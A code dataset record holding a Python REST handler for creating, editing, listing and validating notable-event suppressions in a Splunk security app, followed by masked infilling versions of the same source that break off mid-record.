log_data['signature'] = 'Error occurred while enabling the suppression: ' + str(e)
else:
log_data['signature'] = 'Error occurred while disabling the suppression: ' + str(e)
logger.error('SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'.format(**log_data))
raise admin.ArgValidationException(e)
# Write out an update to the eventtypes config file
entity.setEntity(conf, sessionKey=self.getSessionKey())
# Log that the suppression was updated
logger.info("Successfully updated the '%s' suppression", name)
# Reload suppressions
self.handleReload()
logger.info('%s completed successfully', actionStr)
logger.info('SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'.format(**log_data))
def handleRemove(self, confInfo):
owner = ((self.context == admin.CONTEXT_APP_AND_USER) and self.userName) or "-"
entity.deleteEntity('configs/conf-eventtypes', self.callerArgs.id, namespace=self.appName, owner=owner, sessionKey=self.getSessionKey())
@staticmethod
def checkConf(settings, stanza=None, confInfo=None, throwExceptionOnError=False):
"""
Checks the settings and raises an exception if the configuration is invalid.
"""
# Below is a list of the required fields. The entries in this list will be removed as they
# are observed. An empty list at the end of the config check indicates that all necessary
# fields where provided.
required_fields = Suppressions.REQUIRED_PARAMS[:]
if stanza is not None and confInfo is not None:
# Add each of the settings
for key, val in settings.items():
# Set val to empty if None
if val is None:
val = ''
if key in Suppressions.VALID_PARAMS:
confInfo[stanza].append(key, val)
# Key is eai; Set meta
elif key.startswith(admin.EAI_ENTRY_ACL):
confInfo[stanza].setMetadata(key, val)
# Key is eai; userName/appName
elif key.startswith(admin.EAI_META_PREFIX):
confInfo[stanza].append(key, val)
# Key is not proper
else:
pass
# Check each of the settings individually
logger.info("Checking general settings for the '%s' suppression", stanza)
for key, val in settings.items():
# Set val to empty if None
if val is None:
val = ''
# Check the disabled/selected value
if key == Suppressions.PARAM_DISABLED:
try:
util.normalizeBoolean(val, enableStrictMode=True)
# Remove the field from the list of required fields
try:
required_fields.remove(key)
except ValueError:
pass # Field not available, probably because it is not required
except ValueError:
raise InvalidParameterValueException(key, val, "must be a valid boolean")
elif key in Suppressions.REQUIRED_PARAMS:
# Remove the field from the list of required fields
try:
required_fields.remove(key)
except ValueError:
pass # Field not available, probably because it is not required
elif key in Suppressions.VALID_PARAMS:
pass
# Key is eai
elif key.startswith(admin.EAI_META_PREFIX):
pass
# Key is not proper
else:
if throwExceptionOnError:
raise UnsupportedParameterException()
else:
logger.warn("The configuration for '%s' contains an unsupported parameter: %s", stanza, key)
# Error if some of the required fields were not provided
if len(required_fields) > 0:
raise InvalidConfigException('The following fields must be defined in the configuration but were not: ' + ', '.join(required_fields).strip())
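        # e.g. Suppressions.checkConf({'disabled': '0', 'search': '`notable`'})
        # passes, while omitting 'search' raises InvalidConfigException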
# initialize the handler
admin.init(Suppressions, admin.CONTEXT_APP_AND_USER)
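# (illustrative) the handler is exposed through restmap.conf; the stanza name and
# action list below are assumptions, not taken from this source:
#   [admin_external:suppressions]
#   handlertype = python
#   handlerfile = suppressions_rest_handler.py
#   handleractions = create, edit, list, remove, _reload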
|
normal
|
{
"blob_id": "675dc9467dd6db9c2a429941af56d78d6c0e1c08",
"index": 4135,
"step-1": "<mask token>\n\n\nclass MissingTransitionException(InvalidConfigException):\n \"\"\"\n Describes a capability that is missing.\n \"\"\"\n\n def __init__(self, transitions):\n self.transitions = transitions\n super(InvalidConfigException, self).__init__(\n 'Missing transition detected')\n\n\n<mask token>\n\n\nclass Suppressions(admin.MConfigHandler):\n \"\"\"\n Set up supported arguments\n \"\"\"\n REQUESTED_ACTIONS = {'1': 'ACTION_CREATE', '2': 'ACTION_LIST', '4':\n 'ACTION_EDIT', '8': 'ACTION_REMOVE', '16': 'ACTION_MEMBERS', '32':\n 'ACTION_RELOAD'}\n WRITE_CAPABILITY = 'edit_suppressions'\n PARAM_DISABLED = 'disabled'\n PARAM_SEARCH = 'search'\n PARAM_DESCRIPTION = 'description'\n VALID_PARAMS = [PARAM_DISABLED, PARAM_SEARCH, PARAM_DESCRIPTION]\n REQUIRED_PARAMS = [PARAM_DISABLED, PARAM_SEARCH]\n CONF_KEY_MAPPING = {'app': 'namespace', 'owner': 'owner'}\n DEFAULT_NAMESPACE = 'SA-ThreatIntelligence'\n DEFAULT_OWNER = 'nobody'\n DEFAULT_DISABLED = 0\n\n def setup(self):\n logger.info('Setting up suppressions_rest_handler')\n self.setWriteCapability(Suppressions.WRITE_CAPABILITY)\n if (self.requestedAction == admin.ACTION_EDIT or self.\n requestedAction == admin.ACTION_CREATE):\n for arg in Suppressions.REQUIRED_PARAMS:\n self.supportedArgs.addReqArg(arg)\n for arg in Suppressions.VALID_PARAMS:\n if arg not in Suppressions.REQUIRED_PARAMS:\n self.supportedArgs.addOptArg(arg)\n\n def handleCreate(self, confInfo):\n \"\"\"Handles creation of a suppression.\"\"\"\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n logger.info('Entering %s', actionStr)\n self.handleReload()\n name = self.callerArgs.id\n args = self.callerArgs.data\n if not name or len(name) == 0:\n raise admin.ArgValidationException(\n 'The name of the suppression must not be empty')\n nameMatch = NotableEventSuppression.suppressionRE.match(name)\n if not nameMatch:\n raise admin.ArgValidationException(\n 'The name of the suppression must follow proper convention')\n if name in self.readConf('eventtypes'):\n raise admin.AlreadyExistsException(\n 'A suppression entry already exists for %s' % name)\n disabled = _getFieldValue(args, Suppressions.PARAM_DISABLED)\n search = _getFieldValue(args, Suppressions.PARAM_SEARCH)\n description = _getFieldValue(args, Suppressions.PARAM_DESCRIPTION)\n conf = entity.getEntity('saved/eventtypes', '_new', sessionKey=self\n .getSessionKey())\n conf.namespace = self.appName\n conf.owner = (self.context == admin.CONTEXT_APP_AND_USER and self.\n userName or '-')\n conf['name'] = name\n _addToDictIfNonNull(conf, Suppressions.PARAM_DISABLED, disabled)\n _addToDictIfNonNull(conf, Suppressions.PARAM_SEARCH, search)\n _addToDictIfNonNull(conf, Suppressions.PARAM_DESCRIPTION, description)\n log_data = {'action': 'create', 'suppression': conf['name'][len(\n NotableEventSuppression.SUPPRESSION_START):], 'user': conf[\n 'eai:acl']['owner'], 'status': 'success', 'signature':\n 'Notable event suppression successfully created'}\n try:\n Suppressions.checkConf(conf, name)\n except InvalidConfigException as e:\n e = (\n \"The configuration for the new suppression '%s' is invalid and could not be created: %s\"\n % (name, str(e)))\n logger.error(e)\n log_data['status'] = 'failure'\n log_data['signature'] = 'Unable to save the event suppression'\n logger.error(\n 'SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'\n .format(**log_data))\n raise 
admin.ArgValidationException(e)\n entity.setEntity(conf, sessionKey=self.getSessionKey())\n logger.info('Successfully added suppression: %s', name)\n self.handleReload()\n logger.info('%s completed successfully', actionStr)\n logger.info(\n 'SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'\n .format(**log_data))\n\n def handleCustom(self, confInfo):\n logger.info('Handling custom action: %s', self.customAction)\n if self.customAction == '_autodisable':\n expired_count, enabled_count = (NotableEventSuppression.\n disable_expired_suppressions(session_key=self.getSessionKey()))\n logger.info(\n '%s expired suppressions detected; %s were enabled (now disabled)'\n , expired_count, enabled_count)\n else:\n self.actionNotImplemented()\n\n def handleList(self, confInfo):\n \"\"\"\n Handles listing of a suppression\n \"\"\"\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n logger.info('Entering %s', actionStr)\n self.handleReload()\n suppressionDict = self.readConfCtx('eventtypes')\n if suppressionDict != None:\n for stanza, settings in suppressionDict.items():\n stanzaMatch = NotableEventSuppression.suppressionRE.match(\n stanza)\n if stanzaMatch:\n try:\n Suppressions.checkConf(settings, stanza, confInfo)\n except InvalidConfigException as e:\n logger.error(\n \"The configuration for suppression '%s' is invalid: %s\"\n , stanza, str(e))\n logger.info('%s completed successfully', actionStr)\n\n def handleReload(self, confInfo=None, makeCSV=True):\n \"\"\"\n Handles refresh/reload of the configuration options\n \"\"\"\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n logger.info('Entering %s', actionStr)\n logger.info(\n 'Refreshing suppression configurations via properties endpoint')\n try:\n refreshInfo = entity.refreshEntities('properties/eventtypes',\n sessionKey=self.getSessionKey())\n except Exception as e:\n logger.warn(\n 'Could not refresh suppression configurations via properties endpoint: %s'\n , str(e))\n logger.info('%s completed successfully', actionStr)\n\n def handleEdit(self, confInfo):\n \"\"\"\n Handles edits to the configuration options\n \"\"\"\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n logger.info('Entering %s', actionStr)\n self.handleReload()\n name = self.callerArgs.id\n args = self.callerArgs\n if name is not None:\n nameMatch = NotableEventSuppression.suppressionRE.match(name)\n if not nameMatch:\n raise admin.ArgValidationException(\n 'The name of the suppression must follow proper convention'\n )\n try:\n conf = entity.getEntity('saved/eventtypes', name,\n sessionKey=self.getSessionKey())\n except ResourceNotFound:\n raise admin.NotFoundException(\n \"A suppression configuration with the given name '%s' could not be found\"\n % name)\n else:\n raise admin.ArgValidationException('No name provided')\n log_data = {'status': 'success', 'action': 'edit', 'signature':\n 'Notable event suppression successfully saved', 'suppression':\n name[len(NotableEventSuppression.SUPPRESSION_START):], 'user':\n conf['eai:userName']}\n for key, val in conf.items():\n if key in args.data:\n new_value = args[key][0]\n if new_value in [None, '']:\n new_value = ' '\n if key == self.PARAM_DISABLED:\n conf_key = 
util.normalizeBoolean(conf[key],\n enableStrictMode=True)\n new_value = util.normalizeBoolean(new_value,\n enableStrictMode=True)\n if conf_key != new_value:\n log_data['action'\n ] = 'disable' if new_value else 'enable'\n log_data['signature'] = (\n 'Suppression successfully disabled' if\n new_value else 'Suppression successfully enabled')\n conf[key] = new_value\n if key == admin.EAI_ENTRY_ACL:\n for k, v in self.CONF_KEY_MAPPING.iteritems():\n if k in val and val[k] is not None and len(val[k]) > 0:\n setattr(conf, v, val[k])\n if conf.namespace is None or len(conf.namespace) == 0:\n conf.namespace = Suppressions.DEFAULT_NAMESPACE\n if conf.owner is None or len(conf.owner) == 0:\n conf.owner = Suppressions.DEFAULT_OWNER\n try:\n Suppressions.checkConf(conf, name)\n except InvalidConfigException as e:\n e = (\n \"The edit attempt for the suppression '%s' produced an invalid configuration: %s\"\n % (name, str(e)))\n logger.error(e)\n log_data['status'] = 'failure'\n if log_data['action'] == 'edit':\n log_data['signature'] = 'Unable to save the event suppression'\n elif log_data['action'] == 'enable':\n log_data['signature'\n ] = 'Error occurred while enabling the suppression: ' + str(\n e)\n else:\n log_data['signature'\n ] = 'Error occurred while disabling the suppression: ' + str(\n e)\n logger.error(\n 'SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'\n .format(**log_data))\n raise admin.ArgValidationException(e)\n entity.setEntity(conf, sessionKey=self.getSessionKey())\n logger.info(\"Successfully updated the '%s' suppression\", name)\n self.handleReload()\n logger.info('%s completed successfully', actionStr)\n logger.info(\n 'SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'\n .format(**log_data))\n\n def handleRemove(self, confInfo):\n owner = (self.context == admin.CONTEXT_APP_AND_USER and self.\n userName or '-')\n entity.deleteEntity('configs/conf-eventtypes', self.callerArgs.id,\n namespace=self.appName, owner=owner, sessionKey=self.\n getSessionKey())\n\n @staticmethod\n def checkConf(settings, stanza=None, confInfo=None,\n throwExceptionOnError=False):\n \"\"\"\n Checks the settings and raises an exception if the configuration is invalid.\n \"\"\"\n required_fields = Suppressions.REQUIRED_PARAMS[:]\n if stanza is not None and confInfo is not None:\n for key, val in settings.items():\n if val is None:\n val = ''\n if key in Suppressions.VALID_PARAMS:\n confInfo[stanza].append(key, val)\n elif key.startswith(admin.EAI_ENTRY_ACL):\n confInfo[stanza].setMetadata(key, val)\n elif key.startswith(admin.EAI_META_PREFIX):\n confInfo[stanza].append(key, val)\n else:\n pass\n logger.info(\"Checking general settings for the '%s' suppression\",\n stanza)\n for key, val in settings.items():\n if val is None:\n val = ''\n if key == Suppressions.PARAM_DISABLED:\n try:\n util.normalizeBoolean(val, enableStrictMode=True)\n try:\n required_fields.remove(key)\n except ValueError:\n pass\n except ValueError:\n raise InvalidParameterValueException(key, val,\n 'must be a valid boolean')\n elif key in Suppressions.REQUIRED_PARAMS:\n try:\n required_fields.remove(key)\n except ValueError:\n pass\n elif key in Suppressions.VALID_PARAMS:\n pass\n elif key.startswith(admin.EAI_META_PREFIX):\n pass\n elif throwExceptionOnError:\n raise UnsupportedParameterException()\n else:\n logger.warn(\n \"The configuration for '%s' contains an unsupported parameter: %s\"\n , stanza, 
key)\n if len(required_fields) > 0:\n raise InvalidConfigException(\n 'The following fields must be defined in the configuration but were not: '\n + ', '.join(required_fields).strip())\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass UnsupportedParameterException(InvalidConfigException):\n \"\"\"\n Describes a config parameter that is unsupported.\n \"\"\"\n pass\n\n\nclass MissingTransitionException(InvalidConfigException):\n \"\"\"\n Describes a capability that is missing.\n \"\"\"\n\n def __init__(self, transitions):\n self.transitions = transitions\n super(InvalidConfigException, self).__init__(\n 'Missing transition detected')\n\n\n<mask token>\n\n\nclass Suppressions(admin.MConfigHandler):\n \"\"\"\n Set up supported arguments\n \"\"\"\n REQUESTED_ACTIONS = {'1': 'ACTION_CREATE', '2': 'ACTION_LIST', '4':\n 'ACTION_EDIT', '8': 'ACTION_REMOVE', '16': 'ACTION_MEMBERS', '32':\n 'ACTION_RELOAD'}\n WRITE_CAPABILITY = 'edit_suppressions'\n PARAM_DISABLED = 'disabled'\n PARAM_SEARCH = 'search'\n PARAM_DESCRIPTION = 'description'\n VALID_PARAMS = [PARAM_DISABLED, PARAM_SEARCH, PARAM_DESCRIPTION]\n REQUIRED_PARAMS = [PARAM_DISABLED, PARAM_SEARCH]\n CONF_KEY_MAPPING = {'app': 'namespace', 'owner': 'owner'}\n DEFAULT_NAMESPACE = 'SA-ThreatIntelligence'\n DEFAULT_OWNER = 'nobody'\n DEFAULT_DISABLED = 0\n\n def setup(self):\n logger.info('Setting up suppressions_rest_handler')\n self.setWriteCapability(Suppressions.WRITE_CAPABILITY)\n if (self.requestedAction == admin.ACTION_EDIT or self.\n requestedAction == admin.ACTION_CREATE):\n for arg in Suppressions.REQUIRED_PARAMS:\n self.supportedArgs.addReqArg(arg)\n for arg in Suppressions.VALID_PARAMS:\n if arg not in Suppressions.REQUIRED_PARAMS:\n self.supportedArgs.addOptArg(arg)\n\n def handleCreate(self, confInfo):\n \"\"\"Handles creation of a suppression.\"\"\"\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n logger.info('Entering %s', actionStr)\n self.handleReload()\n name = self.callerArgs.id\n args = self.callerArgs.data\n if not name or len(name) == 0:\n raise admin.ArgValidationException(\n 'The name of the suppression must not be empty')\n nameMatch = NotableEventSuppression.suppressionRE.match(name)\n if not nameMatch:\n raise admin.ArgValidationException(\n 'The name of the suppression must follow proper convention')\n if name in self.readConf('eventtypes'):\n raise admin.AlreadyExistsException(\n 'A suppression entry already exists for %s' % name)\n disabled = _getFieldValue(args, Suppressions.PARAM_DISABLED)\n search = _getFieldValue(args, Suppressions.PARAM_SEARCH)\n description = _getFieldValue(args, Suppressions.PARAM_DESCRIPTION)\n conf = entity.getEntity('saved/eventtypes', '_new', sessionKey=self\n .getSessionKey())\n conf.namespace = self.appName\n conf.owner = (self.context == admin.CONTEXT_APP_AND_USER and self.\n userName or '-')\n conf['name'] = name\n _addToDictIfNonNull(conf, Suppressions.PARAM_DISABLED, disabled)\n _addToDictIfNonNull(conf, Suppressions.PARAM_SEARCH, search)\n _addToDictIfNonNull(conf, Suppressions.PARAM_DESCRIPTION, description)\n log_data = {'action': 'create', 'suppression': conf['name'][len(\n NotableEventSuppression.SUPPRESSION_START):], 'user': conf[\n 'eai:acl']['owner'], 'status': 'success', 'signature':\n 'Notable event suppression successfully created'}\n try:\n Suppressions.checkConf(conf, name)\n except InvalidConfigException as e:\n e = (\n \"The configuration for the new suppression '%s' is invalid and could not be created: %s\"\n % (name, str(e)))\n logger.error(e)\n log_data['status'] = 'failure'\n log_data['signature'] = 'Unable to save the event suppression'\n logger.error(\n 
'SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'\n .format(**log_data))\n raise admin.ArgValidationException(e)\n entity.setEntity(conf, sessionKey=self.getSessionKey())\n logger.info('Successfully added suppression: %s', name)\n self.handleReload()\n logger.info('%s completed successfully', actionStr)\n logger.info(\n 'SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'\n .format(**log_data))\n\n def handleCustom(self, confInfo):\n logger.info('Handling custom action: %s', self.customAction)\n if self.customAction == '_autodisable':\n expired_count, enabled_count = (NotableEventSuppression.\n disable_expired_suppressions(session_key=self.getSessionKey()))\n logger.info(\n '%s expired suppressions detected; %s were enabled (now disabled)'\n , expired_count, enabled_count)\n else:\n self.actionNotImplemented()\n\n def handleList(self, confInfo):\n \"\"\"\n Handles listing of a suppression\n \"\"\"\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n logger.info('Entering %s', actionStr)\n self.handleReload()\n suppressionDict = self.readConfCtx('eventtypes')\n if suppressionDict != None:\n for stanza, settings in suppressionDict.items():\n stanzaMatch = NotableEventSuppression.suppressionRE.match(\n stanza)\n if stanzaMatch:\n try:\n Suppressions.checkConf(settings, stanza, confInfo)\n except InvalidConfigException as e:\n logger.error(\n \"The configuration for suppression '%s' is invalid: %s\"\n , stanza, str(e))\n logger.info('%s completed successfully', actionStr)\n\n def handleReload(self, confInfo=None, makeCSV=True):\n \"\"\"\n Handles refresh/reload of the configuration options\n \"\"\"\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n logger.info('Entering %s', actionStr)\n logger.info(\n 'Refreshing suppression configurations via properties endpoint')\n try:\n refreshInfo = entity.refreshEntities('properties/eventtypes',\n sessionKey=self.getSessionKey())\n except Exception as e:\n logger.warn(\n 'Could not refresh suppression configurations via properties endpoint: %s'\n , str(e))\n logger.info('%s completed successfully', actionStr)\n\n def handleEdit(self, confInfo):\n \"\"\"\n Handles edits to the configuration options\n \"\"\"\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n logger.info('Entering %s', actionStr)\n self.handleReload()\n name = self.callerArgs.id\n args = self.callerArgs\n if name is not None:\n nameMatch = NotableEventSuppression.suppressionRE.match(name)\n if not nameMatch:\n raise admin.ArgValidationException(\n 'The name of the suppression must follow proper convention'\n )\n try:\n conf = entity.getEntity('saved/eventtypes', name,\n sessionKey=self.getSessionKey())\n except ResourceNotFound:\n raise admin.NotFoundException(\n \"A suppression configuration with the given name '%s' could not be found\"\n % name)\n else:\n raise admin.ArgValidationException('No name provided')\n log_data = {'status': 'success', 'action': 'edit', 'signature':\n 'Notable event suppression successfully saved', 'suppression':\n name[len(NotableEventSuppression.SUPPRESSION_START):], 'user':\n conf['eai:userName']}\n for key, val in conf.items():\n if key in 
args.data:\n new_value = args[key][0]\n if new_value in [None, '']:\n new_value = ' '\n if key == self.PARAM_DISABLED:\n conf_key = util.normalizeBoolean(conf[key],\n enableStrictMode=True)\n new_value = util.normalizeBoolean(new_value,\n enableStrictMode=True)\n if conf_key != new_value:\n log_data['action'\n ] = 'disable' if new_value else 'enable'\n log_data['signature'] = (\n 'Suppression successfully disabled' if\n new_value else 'Suppression successfully enabled')\n conf[key] = new_value\n if key == admin.EAI_ENTRY_ACL:\n for k, v in self.CONF_KEY_MAPPING.iteritems():\n if k in val and val[k] is not None and len(val[k]) > 0:\n setattr(conf, v, val[k])\n if conf.namespace is None or len(conf.namespace) == 0:\n conf.namespace = Suppressions.DEFAULT_NAMESPACE\n if conf.owner is None or len(conf.owner) == 0:\n conf.owner = Suppressions.DEFAULT_OWNER\n try:\n Suppressions.checkConf(conf, name)\n except InvalidConfigException as e:\n e = (\n \"The edit attempt for the suppression '%s' produced an invalid configuration: %s\"\n % (name, str(e)))\n logger.error(e)\n log_data['status'] = 'failure'\n if log_data['action'] == 'edit':\n log_data['signature'] = 'Unable to save the event suppression'\n elif log_data['action'] == 'enable':\n log_data['signature'\n ] = 'Error occurred while enabling the suppression: ' + str(\n e)\n else:\n log_data['signature'\n ] = 'Error occurred while disabling the suppression: ' + str(\n e)\n logger.error(\n 'SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'\n .format(**log_data))\n raise admin.ArgValidationException(e)\n entity.setEntity(conf, sessionKey=self.getSessionKey())\n logger.info(\"Successfully updated the '%s' suppression\", name)\n self.handleReload()\n logger.info('%s completed successfully', actionStr)\n logger.info(\n 'SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'\n .format(**log_data))\n\n def handleRemove(self, confInfo):\n owner = (self.context == admin.CONTEXT_APP_AND_USER and self.\n userName or '-')\n entity.deleteEntity('configs/conf-eventtypes', self.callerArgs.id,\n namespace=self.appName, owner=owner, sessionKey=self.\n getSessionKey())\n\n @staticmethod\n def checkConf(settings, stanza=None, confInfo=None,\n throwExceptionOnError=False):\n \"\"\"\n Checks the settings and raises an exception if the configuration is invalid.\n \"\"\"\n required_fields = Suppressions.REQUIRED_PARAMS[:]\n if stanza is not None and confInfo is not None:\n for key, val in settings.items():\n if val is None:\n val = ''\n if key in Suppressions.VALID_PARAMS:\n confInfo[stanza].append(key, val)\n elif key.startswith(admin.EAI_ENTRY_ACL):\n confInfo[stanza].setMetadata(key, val)\n elif key.startswith(admin.EAI_META_PREFIX):\n confInfo[stanza].append(key, val)\n else:\n pass\n logger.info(\"Checking general settings for the '%s' suppression\",\n stanza)\n for key, val in settings.items():\n if val is None:\n val = ''\n if key == Suppressions.PARAM_DISABLED:\n try:\n util.normalizeBoolean(val, enableStrictMode=True)\n try:\n required_fields.remove(key)\n except ValueError:\n pass\n except ValueError:\n raise InvalidParameterValueException(key, val,\n 'must be a valid boolean')\n elif key in Suppressions.REQUIRED_PARAMS:\n try:\n required_fields.remove(key)\n except ValueError:\n pass\n elif key in Suppressions.VALID_PARAMS:\n pass\n elif key.startswith(admin.EAI_META_PREFIX):\n pass\n elif throwExceptionOnError:\n raise 
UnsupportedParameterException()\n else:\n logger.warn(\n \"The configuration for '%s' contains an unsupported parameter: %s\"\n , stanza, key)\n if len(required_fields) > 0:\n raise InvalidConfigException(\n 'The following fields must be defined in the configuration but were not: '\n + ', '.join(required_fields).strip())\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass InvalidParameterValueException(InvalidConfigException):\n <mask token>\n\n def __init__(self, field, value, value_must_be):\n message = (\n \"The value for the parameter '%s' is invalid: %s (was %s)\" % (\n field, value_must_be, value))\n super(InvalidConfigException, self).__init__(message)\n\n\nclass UnsupportedParameterException(InvalidConfigException):\n \"\"\"\n Describes a config parameter that is unsupported.\n \"\"\"\n pass\n\n\nclass MissingTransitionException(InvalidConfigException):\n \"\"\"\n Describes a capability that is missing.\n \"\"\"\n\n def __init__(self, transitions):\n self.transitions = transitions\n super(InvalidConfigException, self).__init__(\n 'Missing transition detected')\n\n\n<mask token>\n\n\nclass Suppressions(admin.MConfigHandler):\n \"\"\"\n Set up supported arguments\n \"\"\"\n REQUESTED_ACTIONS = {'1': 'ACTION_CREATE', '2': 'ACTION_LIST', '4':\n 'ACTION_EDIT', '8': 'ACTION_REMOVE', '16': 'ACTION_MEMBERS', '32':\n 'ACTION_RELOAD'}\n WRITE_CAPABILITY = 'edit_suppressions'\n PARAM_DISABLED = 'disabled'\n PARAM_SEARCH = 'search'\n PARAM_DESCRIPTION = 'description'\n VALID_PARAMS = [PARAM_DISABLED, PARAM_SEARCH, PARAM_DESCRIPTION]\n REQUIRED_PARAMS = [PARAM_DISABLED, PARAM_SEARCH]\n CONF_KEY_MAPPING = {'app': 'namespace', 'owner': 'owner'}\n DEFAULT_NAMESPACE = 'SA-ThreatIntelligence'\n DEFAULT_OWNER = 'nobody'\n DEFAULT_DISABLED = 0\n\n def setup(self):\n logger.info('Setting up suppressions_rest_handler')\n self.setWriteCapability(Suppressions.WRITE_CAPABILITY)\n if (self.requestedAction == admin.ACTION_EDIT or self.\n requestedAction == admin.ACTION_CREATE):\n for arg in Suppressions.REQUIRED_PARAMS:\n self.supportedArgs.addReqArg(arg)\n for arg in Suppressions.VALID_PARAMS:\n if arg not in Suppressions.REQUIRED_PARAMS:\n self.supportedArgs.addOptArg(arg)\n\n def handleCreate(self, confInfo):\n \"\"\"Handles creation of a suppression.\"\"\"\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n logger.info('Entering %s', actionStr)\n self.handleReload()\n name = self.callerArgs.id\n args = self.callerArgs.data\n if not name or len(name) == 0:\n raise admin.ArgValidationException(\n 'The name of the suppression must not be empty')\n nameMatch = NotableEventSuppression.suppressionRE.match(name)\n if not nameMatch:\n raise admin.ArgValidationException(\n 'The name of the suppression must follow proper convention')\n if name in self.readConf('eventtypes'):\n raise admin.AlreadyExistsException(\n 'A suppression entry already exists for %s' % name)\n disabled = _getFieldValue(args, Suppressions.PARAM_DISABLED)\n search = _getFieldValue(args, Suppressions.PARAM_SEARCH)\n description = _getFieldValue(args, Suppressions.PARAM_DESCRIPTION)\n conf = entity.getEntity('saved/eventtypes', '_new', sessionKey=self\n .getSessionKey())\n conf.namespace = self.appName\n conf.owner = (self.context == admin.CONTEXT_APP_AND_USER and self.\n userName or '-')\n conf['name'] = name\n _addToDictIfNonNull(conf, Suppressions.PARAM_DISABLED, disabled)\n _addToDictIfNonNull(conf, Suppressions.PARAM_SEARCH, search)\n _addToDictIfNonNull(conf, Suppressions.PARAM_DESCRIPTION, description)\n log_data = {'action': 'create', 'suppression': conf['name'][len(\n NotableEventSuppression.SUPPRESSION_START):], 'user': conf[\n 'eai:acl']['owner'], 'status': 'success', 'signature':\n 'Notable event suppression successfully created'}\n try:\n Suppressions.checkConf(conf, 
name)\n except InvalidConfigException as e:\n e = (\n \"The configuration for the new suppression '%s' is invalid and could not be created: %s\"\n % (name, str(e)))\n logger.error(e)\n log_data['status'] = 'failure'\n log_data['signature'] = 'Unable to save the event suppression'\n logger.error(\n 'SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'\n .format(**log_data))\n raise admin.ArgValidationException(e)\n entity.setEntity(conf, sessionKey=self.getSessionKey())\n logger.info('Successfully added suppression: %s', name)\n self.handleReload()\n logger.info('%s completed successfully', actionStr)\n logger.info(\n 'SuppressionAudit - suppression={suppression}; action={action}; status={status}; signature={signature}; user={user};'\n .format(**log_data))\n\n def handleCustom(self, confInfo):\n logger.info('Handling custom action: %s', self.customAction)\n if self.customAction == '_autodisable':\n expired_count, enabled_count = (NotableEventSuppression.\n disable_expired_suppressions(session_key=self.getSessionKey()))\n logger.info(\n '%s expired suppressions detected; %s were enabled (now disabled)'\n , expired_count, enabled_count)\n else:\n self.actionNotImplemented()\n\n def handleList(self, confInfo):\n \"\"\"\n Handles listing of a suppression\n \"\"\"\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n logger.info('Entering %s', actionStr)\n self.handleReload()\n suppressionDict = self.readConfCtx('eventtypes')\n if suppressionDict != None:\n for stanza, settings in suppressionDict.items():\n stanzaMatch = NotableEventSuppression.suppressionRE.match(\n stanza)\n if stanzaMatch:\n try:\n Suppressions.checkConf(settings, stanza, confInfo)\n except InvalidConfigException as e:\n logger.error(\n \"The configuration for suppression '%s' is invalid: %s\"\n , stanza, str(e))\n logger.info('%s completed successfully', actionStr)\n\n def handleReload(self, confInfo=None, makeCSV=True):\n \"\"\"\n Handles refresh/reload of the configuration options\n \"\"\"\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n logger.info('Entering %s', actionStr)\n logger.info(\n 'Refreshing suppression configurations via properties endpoint')\n try:\n refreshInfo = entity.refreshEntities('properties/eventtypes',\n sessionKey=self.getSessionKey())\n except Exception as e:\n logger.warn(\n 'Could not refresh suppression configurations via properties endpoint: %s'\n , str(e))\n logger.info('%s completed successfully', actionStr)\n\n def handleEdit(self, confInfo):\n \"\"\"\n Handles edits to the configuration options\n \"\"\"\n actionStr = str(self.requestedAction)\n if actionStr in Suppressions.REQUESTED_ACTIONS:\n actionStr = Suppressions.REQUESTED_ACTIONS[actionStr]\n logger.info('Entering %s', actionStr)\n self.handleReload()\n name = self.callerArgs.id\n args = self.callerArgs\n if name is not None:\n nameMatch = NotableEventSuppression.suppressionRE.match(name)\n if not nameMatch:\n raise admin.ArgValidationException(\n 'The name of the suppression must follow proper convention'\n )\n try:\n conf = entity.getEntity('saved/eventtypes', name,\n sessionKey=self.getSessionKey())\n except ResourceNotFound:\n raise admin.NotFoundException(\n \"A suppression configuration with the given name '%s' could not be found\"\n % name)\n else:\n raise 
